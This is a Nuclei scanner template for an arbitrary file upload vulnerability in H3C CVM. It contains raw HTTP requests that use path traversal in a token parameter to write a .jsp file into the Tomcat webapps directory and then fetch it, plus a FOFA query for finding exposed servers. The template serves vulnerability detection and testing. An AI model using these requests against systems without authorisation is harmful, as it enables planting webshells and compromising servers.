id: h3c-cvm-arbitrary-file-upload

info:
  name: H3C CVM - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/h3c-cvm-fileupload.yaml
    - https://github.com/tr0uble-mAker/POC-bomber/blob/main/pocs/redteam/h3c_cvm_fileupload_2022.py
  metadata:
    verified: true
    max-request: 2
    fofa-query: server="H3C-CVM"
  tags: h3c,lfi,instrusive,file-upload,intrusive
variables:
  filename: "{{rand_base(5)}}"
  payload: "{{rand_base(8)}}"

http:
  - raw:
      - |
        POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{{filename}}.jsp&name=222" HTTP/1.1
        Host: {{Hostname}}
        Content-range: bytes 0-10/20
        Accept-Encoding: gzip, deflate

        {{payload}}
      - |
        GET /cas/js/lib/buttons/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{payload}}"

      - type: word
        part: header
        words:
          - "Content-Type: text/html"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100afc1760cfa434e367bb33df7f5637dadba8e63aa69c0df3f897704c8ee24ade602200cd025b7689fc691584f540db3067bcbfcc557430f59d59d2b9b8f86b015b74c:922c64590222798bb761d5b6d8e72950